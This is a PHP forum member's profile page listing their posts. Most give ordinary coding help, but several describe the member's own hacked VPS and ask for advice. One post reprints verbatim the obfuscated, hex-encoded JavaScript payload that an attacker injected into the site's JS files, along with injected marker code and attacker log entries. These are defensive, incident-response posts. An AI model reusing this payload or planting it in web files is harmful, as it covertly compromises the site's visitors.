Jump to content

tommyboy123x

Members
  • Posts

    106
  • Joined

  • Last visited

About tommyboy123x

  • Birthday 03/04/1981

Contact Methods

  • AIM
    keepitguilleaume
  • Website URL
    http://www.dollarhauler.com/

Profile Information

  • Gender
    Male
  • Location
    Scottsdale, AZ

tommyboy123x's Achievements

Member

Member (2/5)

0

Reputation

  1. Damn, thank you so much dark.... I didn't realize how out of touch I was. I also wanted to give an update here - the attacker has attempted two other times to add some obfusicated javascirpt code in the js files... this is becoming a serious problem. try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e85877e2e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e85877e3c8180712e4b2e357682827e483d3d82738182403c767d818288773c717d7b3d777b753d44547085507c62523c7e767e3549182e85877e3c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e85877e3c8182877a733c707d807273802e4b2e353e3549182e85877e3c8182877a733c7673777576822e4b2e35477e863549182e85877e3c8182877a733c85777282762e4b2e35457e863549182e85877e3c8182877a733c7a7374822e4b2e353f7e863549182e85877e3c8182877a733c827d7e2e4b2e353f7e86354918182e77742e362f727d71837b737c823c757382537a737b737c8250875772363585877e3537372e89182e727d71837b737c823c858077827336354a7277842e77724b6a3585877e6a354c4a3d7277844c353749182e727d71837b737c823c757382537a737b737c8250875772363585877e35373c6f7e7e737c725176777a723685877e3749182e8b188b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e89182e846f802e827d726f872e4b2e7c73852e526f8273363749182e846f802e73867e7780732e4b2e7c73852e526f8273363749182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f49182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f87813749182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a837337182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e30303749188b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e89182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e3749182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f49182e77742e362e362e2f81826f80822e372e3434182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e37182e89182e80738283807c2e7c837a7a49182e8b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a49182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e3749182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c75827649182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e3749188b1877742e367c6f8477756f827d803c717d7d797773537c6f707a737237188918777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491818888888747474363749188b188b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z)); How are you testing these injections? Are you convinced this is the cause of these attacks? When I try something like "X' or 1=1" (without the quotes) I can't get it to work how I would expect. I'll be back in a few days with the changes.
  2. Could you elaborate? As far as I'm aware, there is no way to add an sql injection on this form... it does pass the data without mysql_real_escape_string but it also converts it into an md5 hash before adding to an SQL line. I also believe this may have been possible because of my lax permission set. A lot of these files were 775 by default, and I think 640 is really what I want. Could this have been the cause? I still can't find the PHP logs, can anyone tell me where to find clues that can help me piece together what happened? It is a debian squeeze environment.
  3. It'll be a few weeks before things are fully operational again, and I don't want to make the same mistake by doing my security checks before I'm finished (and creating these openings). I have a hunch it was actually an exploit related to an on-site chat, which writes a string to a file to update the "last edited" time. It is a "comet implementation" based on http://www.zeitoun.net/articles/comet_and_php/start. I believe the attacker may have used this to gain write permissions. I also got lazy and made my ftp account the same group as apache (and the owner of ALL web files) which may have contributed to this. Anyways, login.php should be fixed for this particular exploit. I'll keep this tab open and post in a couple weeks when I do a complete analysis.
  4. Thanks for the help - I thought login.php used mysql_real_escape_string. A few years back I went through pretty carefully looking for XSS possibilities and other things like that, this must have been updated since then. I'll assume this was an SQL injection of some kind and keep my eyes out for other exploit possiblities. Thanks!
  5. I have this in my apache logs [Fri Jul 26 23:47:25 2013] [error] [client 96.254.171.2] script '/var/www/azenv.php' not found or unable to stat as well as a few other attempted fails at viewing directories and files that don't exist (such as /etc/apache2/htdocs and /var/www/config) In the access log I have this: 96.254.171.2 - - [21/Jul/2013:01:30:02 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT ws NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)" 96.254.171.2 - - [26/Jul/2013:07:56:15 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9$ 77.73.5.166 - - [26/Jul/2013:07:56:32 +0000] "GET /wR38jPHK.gif HTTP/1.0" 200 262 "-" "Mozilla/5.0(Windows NT 5.0) AppleWebKit/5332 (KHTML, like Gecko) Chrome/13.0.813$ Still trying to track down my php error logs based on my php.ini files, I'll edit if found but is any of this suspicious to you?
  6. I'm not sure this is the right place to post this, but here it goes... There seems to have been something that happened on July 26th - I haven't touched these files in months, yet there's this code added in the most common PHP files (like index.php, login.php) and EVERY javascript file php is as follows: <? #0f2490# echo('<img src=\"http://localhost/\" >'); #/0f2490# ?> and on all my javascript files: /*0f2490*/ document.write('<img src="http://localhost/" >'); /*0f2490*/ The exact same issue as this guy (on the same date) - http://translate.google.com/translate?hl=en&sl=de&u=http://www.awardcafe.de/printthread.php%3Ftid%3D1513&prev=/search%3Fq%3D0f2490%2Blocalhost%2B0f2490%26safe%3Doff%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26channel%3Dfflb%26biw%3D1162%26bih%3D581 Was my server compromised? What steps can I take to ensure this doesn't happen again? Its on a VPS I manage, so I wouldn't be too surprised if I ****ed something up, let me know what (if any) access logs you think may be relevant or even where to begin with this problem. Thanks!
  7. Eureka! I found out you need to send something to the browser in order to check if it is still alive - I chose "echo chr(0);" but you can also use echo "\n"; from what I hear. Tom
  8. I'm not sure what PHP considers an "aborted connection" and things like that, but the way this chat works is by updating a file and using the timestamp off it to determine if new posts exist. Rather than re-checking the server over and over, this code will check once and keep the connection open until a response is made. The only problem is, it works too well! Even after the tab is closed and I try another script on the site or the same script, it all hangs until I update the file - here is the code snippet: while (($currentmodif <= $lastmodif) && (connection_aborted() == 0) && (connection_status() == 0)){ // check if the data file has been modified usleep(10000); // sleep 10ms to unload the CPU if (connection_aborted ()) break; if (connection_status () != 0) break; clearstatcache(); $currentmodif = filemtime($filename); } I have put several measures in to attempt to break the loop when the user disconnects, but it just doesn't work! It will continue to hang and hang and hang until I re-upload the file $filename HOW CAN I BREAK THE WHILE LOOP WHEN THE MEMBER LEAVES THE PAGE? I could post up an example but its ultimately useless after one load unless you have control over updating the file. Thanks!
  9. this might sound dumb, but shouldn't "<?=" be "<?" in the title? could you change that to "<?php" ?
  10. Try unparsing the PHP code when the xampp code begins; One guess I have is that when the xampp code begins, it tries to start a new "<?php" when it has already been opened. I could tell you a little more if I saw the code / website
  11. It would definitely start by naming variables what they should be. I've noticed that it makes things a lot harder once you look back at old code or even when you are debugging. I'm with zanus on this one. Can you explain a bit more of what is going on / what the script does? There must be more than 1 file, right?
  12. I think hes just looking for an easy way to add a few thousand zip codes to a database I would just make a table with all the places / locations / cities in it you want, then assign zip codes. From there you can have a search that would look like SELECT * FROM zipcodes WHERE zip='$zipcode' ORDER BY location ASC good luck!
  13. I know you said PHP posting was the easiest, but why not just use a simple flash based uploader? you can find tons of those scripts online. PHP isn't really designed to upload big files, unless i'm mistaken =\
  14. well mysql is searching literally for '"8/07/%"'. instead what you want is '"8/07/"%', if that makes any sense? If you want to keep the date how it is formatted but search for only the first part of the date, you need to store date as $date = date ('y/m/'); then the query should look like SELECT * FROM `data` WHERE ... AND `data` LIKE '$date%' ORDER BY id DESC note you use of "LIKE" instead of "=", and the % wild card at the end of $date However, for a possibly more efficient way to keep records, store your data in the table as unix timestamps (number of seconds from December 31st 1969 12:00), and search for a date range that would correspond to the particular day you want to find (which in this case would be between 1216267200 and 1216353600). You can find some unix timestamp converters online, use time() to return a unix timestamp, date([FORMATTED DATE], [uNIX TIMESTAMP]) to reverse the process, etc. They are a lot easier to work with in the long run.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.